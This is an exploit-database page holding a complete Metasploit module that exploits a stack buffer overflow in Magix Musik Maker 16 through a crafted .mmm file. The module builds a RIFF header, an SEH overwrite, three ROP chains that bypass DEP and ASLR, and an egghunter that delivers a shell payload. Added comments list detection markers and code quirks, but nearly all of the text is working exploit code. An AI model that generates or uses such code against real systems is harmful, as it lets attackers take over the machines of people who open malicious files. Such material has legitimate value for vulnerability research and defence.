
Magix Musik Maker 16 - '.mmm' Local Stack Buffer Overflow (Metasploit)

22 May 2011 00:00:00 — Reported by Metasploit — Type: exploitdb

Stack Buffer Overflow in Magix Musik Maker 16

Code
##
# $Id: magix_musikmaker_16_mmm.rb 12688 2011-05-22 23:41:15Z swtornio $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

# Metasploit file-format module for Magix Musik Maker 16 arrangement files (.mmm).
#
# The module does no network interaction: `exploit` assembles a crafted .mmm
# byte string in memory and hands it to `file_create`, which writes it to the
# path given by the FILENAME option. Per the module Description, the root cause
# is an unbounded strcpy() on a string inside the file that lets a SEH handler be
# overwritten; the module pairs a ROP chain with an egghunter to reach the payload.
#
# Defender notes (all drawn from constants visible below): the generated file
# carries fixed structure markers ("RIFF", "SEKDSVIP", "LISTx", "physfile"), a
# fixed "C:\temp\" prefix in the oversized path, a fixed egg tag "Wo0t", and a
# fixed set of gadget addresses; only the `rand_text`/`junk` fillers vary between
# runs. The affected application version and the vendor references are listed in
# the module metadata; avoiding untrusted .mmm files and applying the vendor fix
# are the mitigations this page supports.
class Metasploit3 < Msf::Exploit::Remote
	# Metasploit reliability ranking for this module.
	Rank = GoodRanking

	# FILEFORMAT supplies the FILENAME option handling and file_create (used at the
	# end of `exploit`); Egghunter supplies generate_egghunter.
	include Msf::Exploit::FILEFORMAT
	include Msf::Exploit::Remote::Egghunter

	# Registers module metadata, payload constraints and the single target.
	#
	# @param info [Hash] metadata merged by update_info
	#
	# Notes on the values below:
	# - 'Payload' => 'BadChars' lists "\x00\x0a\x0d", but `exploit` passes an
	#   empty badchars string to generate_egghunter (see there).
	# - 'DisableNops' is the string 'True', not the boolean true; both are truthy
	#   in Ruby, so the effect is the same unless the framework compares exactly.
	# - The target's 'OffSet' (198) sizes the filler after the first ROP chain and
	#   'Ret' is the address written over the SEH handler slot.
	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Magix Musik Maker 16 .mmm Stack Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in Magix Musik Maker 16.
				When opening a specially crafted arrangement file (.mmm) in the application, an
				unsafe strcpy() will allow you to overwrite a SEH handler.  This exploit
				bypasses DEP & ASLR, and works on XP, Vista & Windows 7.  Egghunter is used, and
				might require up to several seconds to receive a shell.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
			[
				'acidgen',      #found the vulnerability
				'corelanc0d3r'  #rop exploit + msf module
			],
			'Version'        => '$Revision: 12688 $',
			'References'     =>
				[
					[ 'OSVDB', '72455'],
					[ 'URL', 'http://www.corelan.be/advisories.php?id=CORELAN-11-002' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'       => 8000,  #could be more, but this is enough
					'DisableNops' =>  'True',
					'BadChars'    => "\x00\x0a\x0d",
				},
			'Platform' => 'win',
			'Targets'        =>
				[
					[
						'Windows Universal DEP & ASLR Bypass',
						{
							'OffSet' => 198,
							'Ret'    => 0x200146fa,  #add esp,40c/ret [ltkrn14n.dll]
						}
					],
				],
			'Privileged'     => false,
			'DisclosureDate' => 'Apr 26 2011',
			'DefaultTarget'  => 0))

		# FILENAME: output path of the generated arrangement file (default msf.mmm).
		register_options(
			[
				OptString.new('FILENAME', [ true, 'mmm file',  'msf.mmm']),
			], self.class)
	end

	# Returns a fresh random unsigned 32-bit integer ("L" = 32-bit unsigned,
	# native byte order) built from four random bytes. Used as throw-away filler
	# dwords inside the ROP chains below; because `junk` is a method call, every
	# array element that names it is evaluated separately and is independently
	# random. The trailing `.to_i` is a no-op on an Integer.
	def junk
		return rand_text(4).unpack("L")[0].to_i
	end

	# Builds the crafted .mmm file and writes it via file_create.
	#
	# Assembly order (see `buffer` near the end): file header, oversized path
	# string, ROP chain 1, random filler, target ret address, pivot filler,
	# ROP chains 2 and 3, a small pre-hunter stub, the egghunter, NOPs, the egg.
	# The method has no return value of interest; its effect is the written file.
	def exploit

		print_status("Creating '#{datastore['FILENAME']}' file ...")

		# NOTE(review): badchars is empty here although the module metadata
		# declares BadChars "\x00\x0a\x0d". payload.encoded is already encoded by
		# the framework, so this may be intentional for the hunter/egg only — confirm.
		badchars = ""
		eggoptions =
		{
			:checksum  => false,
			:eggtag    => "Wo0t",     # fixed tag: the same marker appears in every generated file
			:depmethod => "copy",
			:depreg    => "edi",
			:depdest   => "ebp"
		}
		hunter,egg = generate_egghunter(payload.encoded,badchars,eggoptions)

		# RIFF-style container header and embedded sample/path records. Apart from
		# the rand_text(8) user-name component, every byte here is a literal, so
		# the header is identical across runs.
		header = "RIFF"
		header << "\x8c"
		header << "A"
		header << "\x07\x00"
		header << "SEKDSVIP"
		header << "\x10\x07\x00\x00\x9b"
		header << "[n"
		header << "\x00" * 5
		header << "\x11"
		header << "\x00" * 3
		header << "\x08"
		header << "\x00" * 3
		header << "D"
		header << "\xac\x00\x00\x11"
		header << "\x00" * 9
		header << "9@"
		header << "\x00\x00\xf0"
		header << "B"
		header << "\x00" * 4
		header << "\xbd\x04\xef\xfe\x00\x00\x01"
		header << "\x00" * 3
		header << "\x10\x00\x04\x00\x02"
		header << "\x00" * 3
		header << "\x10\x00\x04\x00\x02\x00"
		header << "?"
		header << "\x00" * 3
		header << "("
		header << "\x00" * 3
		header << "\x04\x00\x04\x00\x01"
		header << "\x00" * 15
		header << "K"
		header << "\x91"
		header << "2"
		header << "\x01\xd0\x02\x00\x00"
		header << "@"
		header << "\x02\x00\x00"
		header << "UUUUUU"
		header << "\xf5"
		header << "?"
		header << "\x10"
		header << "\x00" * 7
		header << "\xff" * 8
		header << "\x00" * 1680
		header << "LISTx"
		header << "\x95\x02\x00"
		header << "physfile"
		header << "\xf8\x08\x00\x00"
		header << "C:\\Documents and Settings\\"
		header << rand_text(8)
		header << "\\My Documents\\MAGIX_Music_Maker_16\\AudioTemp"
		header << "\x00" * 52
		header << "Fat Rocker I_ogg.HDP"
		header << "\x00" * 110
		header << "C:\\Documents and Settings\\All Users\\Application Data\\MAGIX\\Music_Maker_16\\_Demos\\Demo"
		header << "\x00" * 175
		header << "Fat Rocker I.OGG"
		header << "\x00" * 678
		header << "\xf0\xbf"
		header << "\x00" * 22
		header << "\xf0"
		header << "?"
		header << "\x00" * 6
		header << "^@"
		header << "\x00" * 6
		header << "^@"
		header << "\x00" * 264

		# Path string that follows the header; presumably the field copied by the
		# unbounded strcpy() named in the Description (the code itself does not say
		# which field overflows). Fixed "C:\temp\" prefix, then gadget addresses.
		filename = "C:\\temp\\"
		filename << "\xb3\x10\xf8\x1f" * 14  # slide
		filename << "\x1e\x92\x01\x20"       # align

		# ROP chains are arrays of 32-bit values packed little-endian ("V*").
		# Gadget addresses are fixed; `junk` entries are per-element random filler.
		rop_chain1 =
		[
			#API pointer
			0x2004e493,  # PUSH ESP # ADD EAX,20 # POP EBX # RETN  ** [LTKRN14N.dll]
			0x1ff810b3,  # rop nop
			0x1ff810b3,  # rop nop
			0x1ff810b3,  # rop nop
			0x20047f30,  # POP ECX # RETN  ** [LTKRN14N.dll]
			0x2005012c,  # &API ptr
			0x200263e4,  # MOV EAX,DWORD PTR DS:[ECX] # RETN  ** [LTKRN14N.dll]
			0x1ffa3ab3,  # MOV DWORD PTR DS:[EBX],EAX # MOV EAX,1 # POP EBX # RETN 0C  ** [LTDIS14n.dll]
			junk,
			0x2004e493,  # PUSH ESP # ADD EAX,20 # POP EBX # RETN    ** [LTKRN14N.dll]
			junk,
			junk,
			junk,
			0x20035546,  # MOV EAX,EBX # POP EBP # POP EBX # RETN  ** [LTKRN14N.dll]
			junk,
			junk,
			0x1ff95f45,  # PUSH EAX # POP ESI # RETN 08  ** [LTDIS14n.dll]
			0x1ffa82ef,  # POP EAX # RETN
			junk,
			junk,
			0x2E9FA63D,
			0x2004cb15,  # ADD EAX,74085539 # ADD EAX,5D58046A # RETN  ** [LTKRN14N.dll] D16059A3
			0x1ff93af7,  # ADD EAX,ESI # POP ESI # RETN  ** [LTDIS14n.dll]
			junk,
			0x20047f30,  # POP ECX # RETN  ** [LTKRN14N.dll]
			0x2001283a,  # POP ESI # POP EBP # POP EBX # ADD ESP,1F4 # RETN 10  ** [LTKRN14N.dll]
			# write
			0x1ff9cf5a,  # MOV DWORD PTR DS:[EAX],ECX # MOV EAX,1 # POP ESI # RETN 08  ** [LTDIS14n.dll]
			junk,
			0x2004e493,  # PUSH ESP # ADD EAX,20 # POP EBX # RETN  ** [LTKRN14N.dll]
			junk,
			junk,
			0x20035546,  # MOV EAX,EBX # POP EBP # POP EBX # RETN  ** [LTKRN14N.dll]
			junk,
			junk,
			0x1ff95f45,  # PUSH EAX # POP ESI # RETN 08  ** [LTDIS14n.dll]
			0x1ffa82ef,  # POP EAX # RETN
			junk,
			junk,
			0x2E9FA5F9,
			0x2004cb15,  # ADD EAX,74085539 # ADD EAX,5D58046A # RETN  ** [LTKRN14N.dll]
			0x1ff93af7,  # ADD EAX,ESI # POP ESI # RETN  ** [LTDIS14n.dll]
			junk,
			0x2003e6cd,  # MOV DWORD PTR DS:[EAX],EDI # POP EDI # POP ESI # MOV EAX,1 # RETN 10  ** [LTKRN14N.dll]
			junk,
			junk,
			0x1ffa82ef,  # POP EAX # RETN    ** [LTDIS14n.dll]
			junk,
		].pack("V*")


		rop_chain2 = [
			0x2004cb15,  # ADD EAX,74085539 # ADD EAX,5D58046A # RETN  ** [LTKRN14N.dll]
			0x1ff7c4e5,  # XCHG EAX,EDI # RETN  ** [LTDIS14n.dll]
			0x2004e493,  # PUSH ESP # ADD EAX,20 # POP EBX # RETN    ** [LTKRN14N.dll]
			0x20035546,  # MOV EAX,EBX # POP EBP # POP EBX # RETN    ** [LTKRN14N.dll]
			junk,
			junk,
			0x1ff95f45,  # PUSH EAX # POP ESI # RETN 08  ** [LTDIS14n.dll]
			0x1ffa82ef,  # POP EAX # RETN
			junk,
			junk,
			0x2E9FA591,
			0x2004cb15,  # ADD EAX,74085539 # ADD EAX,5D58046A # RETN  ** [LTKRN14N.dll]  D16059A3
			0x1ff93af7,  # ADD EAX,ESI # POP ESI # RETN  ** [LTDIS14n.dll]
			junk,
			0x2003e6cd,  # MOV DWORD PTR DS:[EAX],EDI # POP EDI # POP ESI # MOV EAX,1 #
			junk,
			junk,
			0x1ffa82ef,  # POP EAX # RETN  ** [LTDIS14n.dll]
			junk,
			junk,
			junk,
			junk,
			0x2E9FB65D,
			0x2004cb15,  # ADD EAX,74085539 # ADD EAX,5D58046A # RETN  ** [LTKRN14N.dll]
			0x1ff7c4e5,  # XCHG EAX,EDI # RETN  ** [LTDIS14n.dll]
			0x2004e493,  # PUSH ESP # ADD EAX,20 # POP EBX # RETN    ** [LTKRN14N.dll]
			0x20035546,  # MOV EAX,EBX # POP EBP # POP EBX # RETN    ** [LTKRN14N.dll]
			junk,
			junk,
			0x1ff95f45,  # PUSH EAX # POP ESI # RETN 08  ** [LTDIS14n.dll]
			0x1ffa82ef,  # POP EAX # RETN
			junk,
			junk,
			0x2E9FA539,
			0x2004cb15,  # ADD EAX,74085539 # ADD EAX,5D58046A # RETN    **D16059A3 [LTKRN14N.dll]
			0x1ff93af7,  # ADD EAX,ESI # POP ESI # RETN  ** [LTDIS14n.dll]
			junk,
			0x2003e6cd,  # MOV DWORD PTR DS:[EAX],EDI # POP EDI # POP ESI # MOV EAX,1 # RETN 10
			junk,
			junk,
			0x2004e494,  # ADD EAX,20 # POP EBX # RETN    ** [LTKRN14N.dll]
			junk,
			junk,
			junk,
			junk,
			junk,
			0x2004e494,  # ADD EAX,20 # POP EBX # RETN    ** [LTKRN14N.dll]
			junk,
			0x1ffa0231,  # DEC EAX # RETN    ** [LTDIS14n.dll]
			0x1ff7c4e5,  # XCHG EAX,EDI # RETN    ** [LTDIS14n.dll]
			0x2004e493,  # PUSH ESP # ADD EAX,20 # POP EBX # RETN    ** [LTKRN14N.dll]
			0x20035546,  # MOV EAX,EBX # POP EBP # POP EBX # RETN    ** [LTKRN14N.dll]
			junk,
			junk,
			0x1ff95f45,  # PUSH EAX # POP ESI # RETN 08  ** [LTDIS14n.dll]
			0x1ffa82ef,  # POP EAX # RETN
			junk,
			junk,
			0x2E9FA4D9,
			0x2004cb15,  # ADD EAX,74085539 # ADD EAX,5D58046A # RETN  D16059A3
			0x1ff93af7,  # ADD EAX,ESI # POP ESI # RETN    ** [LTDIS14n.dll]
			junk,
			0x2003e6cd,  # MOV DWORD PTR DS:[EAX],EDI # POP EDI # POP ESI # MOV EAX,1 # RETN 10  ** [LTKRN14N.dll]
			junk,
			junk,
			0x2004e493,  # PUSH ESP # ADD EAX,20 # POP EBX # RETN  ** [LTKRN14N.dll]
			junk,
			junk,
			junk,
			junk,
			0x20035546,  # MOV EAX,EBX # POP EBP # POP EBX # RETN  ** [LTKRN14N.dll]
			junk,
			junk,
			0x1ff95f45,  # PUSH EAX # POP ESI # RETN 08  ** [LTDIS14n.dll]
			0x1ffa82ef,  # POP EAX # RETN
			junk,
			junk,
			0x2E9FA469,
			0x2004cb15,  # ADD EAX,74085539 # ADD EAX,5D58046A # RETN    ** [LTKRN14N.dll]
			0x1ff93af7,  # ADD EAX,ESI # POP ESI # RETN    ** [LTDIS14n.dll]
			junk,
			0x1ff72ce1,  # XCHG EAX,ESP # POP EDI # POP ESI # POP EBP # POP EBX # MOV EAX,1 # RETN
			junk,
		].pack("V*")

		rop_chain3 = [
			0x1ff95f45,  # PUSH EAX # POP ESI # RETN 08
			junk,
			junk,
			junk,
			junk,
			0x1ffa82ef,  # POP EAX # RETN
			junk,
			junk,
			0x2004FF98,
			0x1ffaccf6,  # ADD EAX,100 # POP EBP # RETN
			junk,
			0x20026406,  # MOV EAX,DWORD PTR DS:[EAX] # NEG EAX # RETN  ** [LTKRN14N.dll]
			0x20026408,  # NEG EAX # RETN         ** [LTKRN14N.dll]
			0x1ff7c4e5,  # XCHG EAX,EDI # RETN    ** [LTDIS14n.dll]
			0x2004da79,  # XOR EAX,EAX # RETN     ** [LTKRN14N.dll]
			0x1ff93ae1,  # ADD EAX,ESI # POP ESI # RETN
			junk,
			0x1ff95f45,  # PUSH EAX # POP ESI # RETN 08  ** [LTDIS14n.dll]
			0x1fffeb75,  # XCHG EAX,EBP # RETN           ** [LTKRN14N.dll]
			junk,
			junk,
			#Oh Irony !
			0x6001ac84,  # PUSHAD # RETN  ** [ijl10.dll]
		].pack("V*")

		# Random padding so that rop_chain1 + filler reaches target['OffSet'] - 2.
		# With the 47 entries (188 bytes) in rop_chain1 above this is 8 bytes; if
		# the chain were ever longer than 196 bytes the argument would go negative.
		rop_chain1_filler = rand_text(target['OffSet'] - rop_chain1.length - 2 )

		# find a close heap
		# Short inline x86 stub placed before the egghunter; the per-line comments
		# give the instruction each byte sequence encodes.
		prehunter = "\x33\xC0"           #xor eax,eax
		prehunter << "\x64\x8B\x40\x30"  #mov eax,fs[:30]
		prehunter << "\x83\xC0\x48"      #add eax,48
		prehunter << "\x83\xC0\x48"      #add eax,48
		prehunter << "\x8B\x10"          #mov edx,[eax]
		prehunter << "\x83\xc2\x4c"      #add edx,4c
		prehunter << "\x83\xc2\x4c"      #add edx,4c
		prehunter << "\x8B\x12"          #mov edx,[edx]

		# NOP sled placed between the hunter and the egg.
		nops = make_nops(100)

		# Bytes that follow the SEH-slot value written from target.ret.
		filler = "\x5D\xC6\x9F\x2E"      # offset to 0x2000
		filler << "\xc2\x53\x02\x20"     # RETN
		filler << "\x04\x80\xfa\x1f"     # jump - first run : 0x1ffa8004 :  {pivot 8}  # POP EDI # POP EBP # RETN  ** [LTDIS14n.dll]
		filler << "\x12\x3a\xff\x1f"     # p/p/p/p/add esp,90/ret [ltkrn14n.dll] - second run
		filler << "\xff\xff\xff\xff"     # access violation

		# NOTE: `buffer = header` makes buffer an alias of the same String object,
		# and `<<` appends in place, so every append below also grows `header`.
		# The later `header + buffer` therefore concatenates the fully assembled
		# buffer with itself — the written file contains the assembled data twice.
		# Left as-is: changing it would alter the generated file's layout.
		buffer = header
		buffer << filename
		buffer << rop_chain1
		buffer << rop_chain1_filler
		buffer << [target.ret].pack("V")
		buffer << filler
		buffer << rop_chain2
		buffer << rop_chain3
		buffer << prehunter
		buffer << hunter
		buffer << nops
		buffer << egg

		filecontent = header + buffer

		print_status("Writing payload to file")

		# FILEFORMAT helper: writes filecontent to datastore['FILENAME'].
		file_create(filecontent)

	end

end
